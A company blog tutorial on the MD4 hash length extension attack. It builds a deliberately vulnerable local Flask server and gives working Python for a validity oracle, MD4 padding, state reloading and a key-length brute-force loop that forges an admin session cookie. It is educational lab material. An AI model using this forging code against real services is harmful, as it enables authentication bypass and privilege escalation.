Length Extension Attack on MD4

By Henrique Marcomini
Published in Sinch Blog, Apr 12, 2021

In this article we will exploit a vulnerable server and understand more about this type of vulnerability in MD4 (it works on MD5, SHA-1 and SHA-256 too). So grab your cup of coffee and let’s dive in.

Photo by Adi Perets from Pexels

So, what exactly are we going to do?

Today I will be exploring an old technique that allows us to forge the signature of some plaintext even if we do not know the underlying secret, as long as that signature is a plain keyed hash of the form hash(key + message).

Here we will create a simple vulnerable web server to use as a target, and the code needed to break it. The attack only works in some scenarios: the signature must be computed as hash(key + message) (a real HMAC is not affected), and the hash algorithm must return its final internal state as the digest, so that we can feed its output back in as an initial state. If you want to see the full attack, just jump to the last part.

The Vulnerable Server

I will make this as simple as possible, so we can focus on the vulnerability itself. These are the definitions for our service:

  • Our web server will contain only two routes, / and /admin
  • In order to access /admin, you must be admin.
  • To be considered admin, you must provide a session cookie
  • The session cookie is composed of base64(username=string&is_admin=boolean).base64(md4(key+username=string&is_admin=boolean))
  • The key is not known to the user
  • To generate a new session token, one must login at /

With those definitions in mind, I came up with the following server in Python using Flask.

This web server generates a signature for the cookie and the only way to generate a new valid signature is to know my_secret, or so you would think.

Now I’ll present the pieces to solve our problem

Enter the oracle

An oracle in security is an entity that can give you an answer to a certain question.

In our case, the oracle will be the entity that answers this simple question: “Is my authentication token valid?” It may not sound like much, but oracles like this are what make many cryptographic attacks work.

In our case, we can define the oracle using the following script:

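import requests

def oracle(val, sig):
    # val and sig are the two base64 strings that make up the auth cookie
    cookie_jar = {'auth': val + '.' + sig}
    r = requests.get("http://0.0.0.0:5000/admin", cookies=cookie_jar)
    # the server answers with this message when the signature does not match
    if "you sure look like a cheater" in r.text:
        return False
    return True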

With the oracle, we have the first piece to solve this puzzle.

The vulnerability itself comes from one fact: the MD4 digest is its inner state.

MD4 works by breaking the message into 512-bit chunks and feeding them to a digestion routine. This routine takes two inputs, a 128-bit state (the IV for the first chunk) and a block of data, and spits out a new 128-bit state.

The thing is that the state that comes out is the IV for the next block of data, so the output of the MD4 algorithm is in reality the inner state after the last digestion step. Here, I’ve made a diagram for you.
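
The chaining described above can be sketched with a toy hash. This is not MD4: `toy_compress` is a made-up stand-in built on truncated SHA-256, the all-zero `IV` is hypothetical, and padding is left out entirely, so messages must be whole 64-byte blocks. It only illustrates that the returned digest is the last chaining value, so anyone holding it can keep hashing.

```python
import hashlib

BLOCK = 64       # bytes per block (512 bits), as in MD4
IV = bytes(16)   # hypothetical initial state; real MD4 uses four fixed 32-bit words


def toy_compress(state: bytes, block: bytes) -> bytes:
    """Stand-in for the digestion routine: (state, block) -> new state."""
    return hashlib.sha256(state + block).digest()[:16]


def toy_hash(message: bytes, state: bytes = IV) -> bytes:
    """Chain the compression function over 64-byte blocks (no padding here)."""
    assert len(message) % BLOCK == 0, "toy example: whole blocks only"
    for i in range(0, len(message), BLOCK):
        state = toy_compress(state, message[i:i + BLOCK])
    return state  # the digest is simply the final inner state


secret_part = b"S" * BLOCK      # something the attacker never sees
digest = toy_hash(secret_part)  # ...but the attacker does see this

extra = b"E" * BLOCK
resumed = toy_hash(extra, state=digest)  # attacker resumes from the digest
full = toy_hash(secret_part + extra)     # what an honest party would compute
print(resumed == full)  # True
```

Real MD4 follows the same chaining, except that the final block also carries padding and the message length, which is the remaining obstacle for the attack.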

What this means is that we can grab the signature that our web server generated, load it as the state, and keep hashing our own data after it. I made another diagram just for you ;)

Oh boy those are loooooong diagrams

So, this is it? Just take the output and append data? It can’t be that simple. Yeaah, it isn’t. I still need to talk about our last missing piece, the original message’s padding.

Understanding why we need the padding length

The idea of this attack is to extend the original data and create a new hash based on it. When I say the original data, I mean the whole thing, padding included.

If we were to hash the following sentence:

We would actually be hashing this sentence with the additional padding, so we are guaranteed to work with whole blocks of 512 bits. The additional padding would be like the following image:

I painted the original data in blue and the padding in orange. The INT part is metadata telling the size of the message in bits, as a little endian 64-bit integer.

So if we were to extend the original message, we would have to do it over the padding, like this:

Notice that the original pad becomes data in our extended data

So it becomes clear that to extend the original message, we just need to know the pad that comes after it. Some of the literature says that you need to discover the key length, but this is just another way of discovering the padding length, since the padding depends only on the total length of key plus data.

How do we get the padding length?

The padding length is the last thing we need to discover, and discovering it is actually already part of the attack.

To find out the padding we will need two very important things:

  • Understand how the MD4 padding works
  • The oracle that we got at the beginning of the article (see, I told you it would be important)

MD4 padding is simple enough. You take the last 512-bit block, append a single 1 bit, then append 0s until you reach bit 448 of a block (starting a new block if there is no room left). Then append the original message size in bits as a 64-bit little endian integer, and we are good to go.

I’ve made a simple function to calculate the padding, supposing that data is composed of 8-bit bytes:

import struct

def pad(data):
    size = len(data)
    # 0x80 is the single 1 bit followed by seven 0 bits
    # the modulo takes care of spilling into a new block when the 1 bit
    # and the 8-byte size do not fit in the current one
    zeros = (55 - size) % 64
    # the size is stored in bits, as a 64-bit little endian integer
    return data + b"\x80" + bytes(zeros) + struct.pack("<Q", size * 8)

This of course can be more elegant, but it will serve for now. Now we just need to slap this together with our oracle, and it should work just fine.
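
Since the padding depends only on the total length being hashed, it can be computed for a guessed key length without knowing the key itself. The sketch below assumes a hypothetical 9-byte key and the payload `username=test`; the helper name `md4_padding` is mine, and the numbers are illustrative values that appear consistent with the 0xB0 length field visible in the sample cookie further down.

```python
import struct


def md4_padding(message_len: int) -> bytes:
    """Padding MD4 appends to a message that is message_len bytes long."""
    zeros = (55 - message_len) % 64
    return b"\x80" + bytes(zeros) + struct.pack("<Q", message_len * 8)


# Assumed values for illustration: a 9-byte key in front of a 13-byte payload.
key_len = 9
data = b"username=test"
glue = md4_padding(key_len + len(data))

print(len(glue))         # 42, so key + data + padding fill exactly one 64-byte block
print(glue[-8:].hex())   # b000000000000000, i.e. 176 bits = 22 bytes, little endian
```

Guessing a different key length changes both the number of zero bytes and the length field, which is why a wrong guess produces a message the server will reject.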

Doing it by hand

Since this article is focused on learning (and hashpump does not transparently implement MD4), we are going to do it by hand. The first step is to find an implementation of MD4 in your language of choice. I’m going to be using Python 3, so I picked this implementation: https://gist.github.com/kangtastic/c3349fc4f9d659ee362b12d7d8c639b6

A few changes are needed to make this work. I’ve extracted the padding routine into an external function, so the code becomes:

class MD4:
    # ... the rest of the class is unchanged from the gist ...

    def __init__(self, msg=None):
        """:param ByteString msg: The message to be hashed."""
        if msg is None:
            msg = b""
        self.msg = msg
        # Pre-processing: Total length is a multiple of 512 bits.
        self.msg = MD4.pad(msg)
        # Process the message in successive 512-bit chunks.
        self._process([self.msg[i : i + 64] for i in range(0, len(self.msg), 64)])

    @staticmethod
    def pad(msg):
        ml = len(msg) * 8  # message length in bits
        msg += b"\x80"  # a single 1 bit followed by seven 0 bits
        msg += bytes(-(len(msg) + 8) % 64)  # zeros up to 8 bytes before the block end
        msg += struct.pack("<Q", ml)  # 64-bit little endian length
        return msg

The first thing that we need to do is to calculate the new signature. Here get_original_cookie is a function that makes a POST to the web server and extracts the values from the cookie.

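import struct

# data and sign are expected to be raw bytes (already base64-decoded)
data, sign = get_original_cookie()
# 1: load the server's signature as the internal state
md4 = MD4()
md4.h = [struct.unpack("<I", sign[i*4:(i+1)*4])[0] for i in range(4)]
# 2: placeholder block + our data, padded; then drop the placeholder block
data_to_append = b'X'*64 + b'isAdmin=true'
data_to_append = md4.pad(data_to_append)[64:]
# 3: digest the remaining block starting from the loaded state
md4.msg = data_to_append
md4._process([md4.msg[i : i + 64] for i in range(0, len(md4.msg), 64)])
new_sign = md4.bytes()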

In #1 we set the internal state of the MD4 object to the signature we got from the server. This is equivalent to substituting MD4’s IV.

In #2 we generate data_to_append, which is a full 512-bit block followed by the string we want to append. The full block is a placeholder for the key, the original data and their padding, which together fill exactly one block as long as key plus data stay under 56 bytes. Then we calculate the padding and throw away the first block (the [64:] throws away the first 64 bytes).

In #3 we make MD4 process the data we got in #2 and get the new signature.

It is very important to understand that we did not need the first 64 bytes, since we already had their digest.
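
The 64-byte placeholder only works when key, data and original padding fit in a single block. A slightly more general way to build the bytes fed to the resumed hash is sketched below; `md4_padding` and `extension_blocks` are hypothetical helper names, and `padded_prefix_len` is assumed to be the length of key + data + original padding.

```python
import struct


def md4_padding(message_len: int) -> bytes:
    """Padding MD4 appends to a message that is message_len bytes long."""
    zeros = (55 - message_len) % 64
    return b"\x80" + bytes(zeros) + struct.pack("<Q", message_len * 8)


def extension_blocks(suffix: bytes, padded_prefix_len: int) -> bytes:
    """Bytes to feed into the resumed hash: the suffix plus its final padding.

    The length field must count everything hashed so far, including the
    already padded prefix, which is always a multiple of 64 bytes.
    """
    assert padded_prefix_len % 64 == 0
    return suffix + md4_padding(padded_prefix_len + len(suffix))


suffix = b"isAdmin=true"

# The placeholder trick from the article, written with the same helper
placeholder = b"X" * 64 + suffix
trick = (placeholder + md4_padding(len(placeholder)))[64:]

print(extension_blocks(suffix, 64) == trick)  # True
```

With a longer key or payload, the same call with `padded_prefix_len=128` would produce a different length field, so the forged signature has to be recomputed for each block count.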

Now that we have our new signature, we need to discover which key/padding length generates this digest. For that we are going to use our oracle, which says whether a data-signature pair is valid.

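from base64 import b64encode

done = False
key_size = 1
while not done:
    # 1: rebuild what the server hashed, using a placeholder key of the guessed size
    new_message = MD4.pad(b'X' * key_size + data)
    # 2: append the admin flag, then drop the placeholder key
    new_message += b'isAdmin=true'
    new_message = new_message[key_size:]
    # 3: the oracle concatenates strings, so decode the base64 bytes first
    val = b64encode(new_message).decode()
    sig = b64encode(new_sign).decode()
    if oracle(val, sig):
        done = True
    else:
        key_size += 1
        if key_size > 1024:
            print("we probably got something wrong")
            break
# only print a cookie if the oracle actually accepted one
if done:
    print("Your forged cookie is " + val + "." + sig)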

In #1 we try to recreate the original data that the web server signed. The important part for us is to guess the key size so we can guess the padding size.

In #2 we take our guess from #1 and append our admin flag. Then we remove the key from the data, since the web server will prepend that for us.

In #3 we ask our oracle if our guess was the correct one. Once it succeeds we print the forged cookie. Since it is very unlikely that the key will be more than 1024 bytes long, I’ve put a limit to stop the script too.

Once we run this script we should get the following output:

Your forged cookie is dXNlcm5hbWU9dGVzdIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAAAAAGlzQWRtaW49dHJ1ZQ==.ABHqD8i58/GcDTzFqNeU9Q==

If we submit this to the web server we will be greeted as admins

Yay

The full script is the following
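
As a self-contained illustration of the whole flow, here is a minimal offline sketch. It is not the gist-based script used above: it carries its own compact MD4 written from RFC 1320, replaces the HTTP oracle with a local function, and uses a made-up 9-byte `SECRET` and the payload `username=test`. All helper names are assumptions.

```python
import struct
from base64 import b64decode, b64encode

IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
SHIFTS = ((3, 7, 11, 19), (3, 5, 9, 13), (3, 9, 11, 15))
ROUND3_ORDER = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def compress(state, block):
    """One MD4 digestion step: (state, 64-byte block) -> new state."""
    x = struct.unpack("<16I", block)
    a, b, c, d = state
    for i in range(48):
        if i < 16:    # round 1
            f, k, add = (b & c) | (~b & d), i, 0
        elif i < 32:  # round 2
            f, k, add = (b & c) | (b & d) | (c & d), (i % 4) * 4 + (i - 16) // 4, 0x5A827999
        else:         # round 3
            f, k, add = b ^ c ^ d, ROUND3_ORDER[i - 32], 0x6ED9EBA1
        s = SHIFTS[i // 16][i % 4]
        a, b, c, d = d, rotl((a + f + x[k] + add) & 0xFFFFFFFF, s), b, c
    return tuple((v + w) & 0xFFFFFFFF for v, w in zip(state, (a, b, c, d)))


def padding(message_len):
    return b"\x80" + bytes((55 - message_len) % 64) + struct.pack("<Q", message_len * 8)


def md4(message, state=IV, prefix_len=0):
    """MD4 of message, optionally resumed from state after prefix_len bytes."""
    message += padding(prefix_len + len(message))
    for i in range(0, len(message), 64):
        state = compress(state, message[i:i + 64])
    return struct.pack("<4I", *state)


# --- Local stand-in for the web server (all values here are made up) ---
SECRET = b"my_secret"  # 9 bytes, never read by the attacker code below


def issue_cookie(data):
    return b64encode(data).decode(), b64encode(md4(SECRET + data)).decode()


def oracle(val, sig):
    return md4(SECRET + b64decode(val)) == b64decode(sig)


# --- Attacker side: only issue_cookie() output and oracle() are used ---
val, sig = issue_cookie(b"username=test")
data, sign = b64decode(val), b64decode(sig)
suffix = b"isAdmin=true"

forged = None
for key_size in range(1, 1025):
    glue = padding(key_size + len(data))            # guessed original padding
    prefix_len = key_size + len(data) + len(glue)   # always a multiple of 64
    new_sign = md4(suffix, state=struct.unpack("<4I", sign), prefix_len=prefix_len)
    new_message = data + glue + suffix
    if oracle(b64encode(new_message).decode(), b64encode(new_sign).decode()):
        forged = b64encode(new_message).decode() + "." + b64encode(new_sign).decode()
        break

print("key size:", key_size)
print("forged cookie:", forged)
```

With the 9-byte secret assumed here, the loop stops at a key size of 9. Against a real server, `oracle` would be the HTTP version shown earlier and `issue_cookie` the login request.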

That’s all folks


This is my company Medium; everything written here is done on company time or using company resources. By the way, I work at Sinch, a really cool company.